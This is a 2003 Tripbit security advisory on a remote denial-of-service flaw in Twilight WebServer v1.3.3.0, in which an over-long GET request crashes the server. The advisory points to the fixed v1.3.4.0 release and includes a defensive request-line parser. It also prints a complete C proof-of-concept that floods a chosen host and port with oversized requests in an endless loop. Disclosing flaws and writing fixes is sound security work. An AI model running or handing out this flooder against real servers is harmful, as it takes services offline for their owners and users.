Twilight WebServer v1.3.3.0 Denial of Service Attack


TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0 
contributed by: rushjo
====================================================================================== 
Tripbit Security Advisory 

TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0 
====================================================================================== 


PROGRAM: Twilight WebServer v1.3.3.0  
HOMEPAGE: http://www.twilightutilities.com
NOT VULNERABLE VERSIONS: v1.3.4.0    
RISK: Medium 
IMPACT: Denial of Service Attack  
RELEASE DATE: 2003-07 


====================================================================================== 
TABLE OF CONTENTS 
====================================================================================== 


1..........................................................DESCRIPTION 
2..............................................................DETAILS 
3..............................................................EXPLOIT 
4............................................................SOLUTIONS 
5........................................................VENDOR STATUS 
6..............................................................CREDITS 
7...........................................................DISCLAIMER 
8...........................................................REFERENCES 
9.............................................................FEEDBACK 


1. DESCRIPTION 
====================================================================================== 


"We are excited to present this completely new Modem Ready Internet Web Server 
supporting these terrific features. 

* Installs in seconds
* Lets you INSTANTLY share pictures and files
* Modem aware
* Automates telling friends and family when you start serving
* Automatically integrates your web camera
* Allows others to send files to you
* Automatically generates web pages
* Supports file resume
* A truly unique files-sharing tool"

(This description is taken from the website of Twilight Utilities)
 

2. DETAILS 
====================================================================================== 


¤ Remote DoS : 


A security vulnerability in Twilight WebServer allows remote 
attackers to crash the server by sending an overly long "GET" request. 


3. EXPLOIT 
====================================================================================== 


This is a proof-of-concept exploit for this buffer overflow vulnerability. 


NOTE: This is only for INFORMATION purposes and not for any 
      destructive acts!


/****************************************************************************
* 	Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
*	Author: posidron
*
*	Date: 2003-07-07
*	Reference: http://www.twilightutilities.com
*	Version: Twilight Webserver v1.3.3.0
*	Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*	
*	Exploit: twilight.c
*	Compile: gcc twilight.c -o twilight
*	
*	Tripbit Security Development
*
*	Contact
*	[-] Mail: posidron@tripbit.org
*	[-] Web: http://www.tripbit.org
*	[-] IRC: irc.euirc.net 6667 #tripbit
*
* 	Program received signal SIGSEGV, Segmentation fault.
*	0x41d780 in ?? ()
*****************************************************************************/

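#include <stdio.h>
#include <stdlib.h>      /* exit(), atoi() */
#include <string.h>      /* memset(), strncpy(), strncat(), strlen() */
#include <unistd.h>      /* write(), close() */
#include <netdb.h>
#include <arpa/inet.h>   /* inet_addr(), htons() */
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
	int sockfd;
	struct sockaddr_in srv;
	struct hostent *host;
	/* flood is a NUL-terminated byte buffer; get[] leaves room for its terminator */
	char send[1052], flood[1038], get[] = "GET", http[12] = "HTTP/1.0\r\n";

	memset(flood, 0x41, 1037);
	flood[1037] = '\0';
	
	/* request line: "GET" + 1037 filler bytes + "HTTP/1.0\r\n" (1050 bytes, fits in send) */
	strncpy(send, get, sizeof(send) -1);
	strncat(send, flood, sizeof(send) - strlen(send) -1);
	strncat(send, http, sizeof(send) - strlen(send) -1);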
	
	if(argc < 3)
	{ 
		printf("Usage: %s [target] <port>\n", argv[0]); 
		exit(0); 
	}

	if((host = gethostbyname(argv[1])) == NULL)
	{	
		printf("Unknown host!\n"); 
		exit(0); 
	}
	
	srv.sin_family = AF_INET;
	srv.sin_port = htons(atoi(argv[2]));
	srv.sin_addr.s_addr = inet_addr((char*)argv[1]);

	printf("DoS against Twilight Webserver v1.3.3.0\n");

	for(;;)
	{
		if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{ 
			printf("Can't start socket()!\n"); exit(0); 
		}
	
		if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
		{ 
			printf("Connection to server broken!\n"); close(sockfd); 
		}
	
		if(write(sockfd, send, strlen(send)) < 0)
		{ 
			break;
		}
	
		close(sockfd);
	}
	
	printf("Attack done!...\n");
	
	return 0;
}



This error crashes the Twilight WebServer v1.3.3.0.



4. SOLUTIONS 
================================================================================ 


Upgrade your Twilight WebServer to the new fixed version v1.3.4.0. This version
is available at http://www.twilightutilities.com. 
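
The crash comes from handling a request line longer than the server expects. As an added example (not code from this advisory or from Twilight WebServer), the following request-line parser bounds every scan and copy and rejects over-long input instead of overflowing; the function name, the limits and the sample input are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#define MAX_LINE   512   /* assumed cap on the whole request line */
#define MAX_METHOD 8     /* assumed field sizes, including the terminator */
#define MAX_TARGET 256

struct request {
    char method[MAX_METHOD];
    char target[MAX_TARGET];
};

/* Parse "METHOD SP target SP version CRLF" from buf[0..len), which need not be
 * NUL-terminated. Returns 0 on success, otherwise the HTTP status to answer
 * with: 400 (malformed or incomplete) or 414 (line or target too long). */
int parse_request_line(const char *buf, size_t len, struct request *out)
{
    /* Never scan past the cap, whatever the peer sent. */
    const char *eol = memchr(buf, '\n', len < MAX_LINE ? len : MAX_LINE);
    if (eol == NULL)
        return len >= MAX_LINE ? 414 : 400;
    size_t n = (size_t)(eol - buf);
    if (n > 0 && buf[n - 1] == '\r')
        n--;
    const char *sp1 = memchr(buf, ' ', n);
    if (sp1 == NULL)
        return 400;
    size_t mlen = (size_t)(sp1 - buf);
    const char *sp2 = memchr(sp1 + 1, ' ', n - mlen - 1);
    if (sp2 == NULL)
        return 400;
    size_t tlen = (size_t)(sp2 - sp1) - 1;
    if (mlen == 0 || mlen >= MAX_METHOD || tlen == 0)
        return 400;
    if (tlen >= MAX_TARGET)
        return 414;                /* reject instead of truncating or overflowing */
    memcpy(out->method, buf, mlen);
    out->method[mlen] = '\0';
    memcpy(out->target, sp1 + 1, tlen);
    out->target[tlen] = '\0';
    return 0;
}

int main(void)
{
    struct request r;
    const char ok[] = "GET /index.html HTTP/1.0\r\n";   /* constructed sample */
    printf("%d\n", parse_request_line(ok, sizeof ok - 1, &r));
    return 0;
}
```

A request line of the size described in this advisory (over 1000 bytes with no line end inside the cap) is answered with 414 before any field is copied.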



5. VENDOR STATUS 
================================================================================ 


The vendor has reportedly been notified. He did not answer the report, but
NOW there is a new fixed version available for download. 



6. CREDITS 
================================================================================ 


Discovered by posidron 



7. DISCLAIMER 
====================================================================== 


The information within this paper may change without notice. Use of 
this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. In no event 
shall the author be liable for any damages whatsoever arising out of 
or in connection with the use or spread of this information. Any use 
of this information is at the user's own risk. 



8. REFERENCES 
====================================================================== 


- Original Version: 
http://www.tripbit.org


9. FEEDBACK 
====================================================================== 


Please send suggestions, updates, and comments to: 


Tripbit Security Advisory 
http://www.tripbit.org 
rushjo@tripbit.org
posidron@tripbit.org 



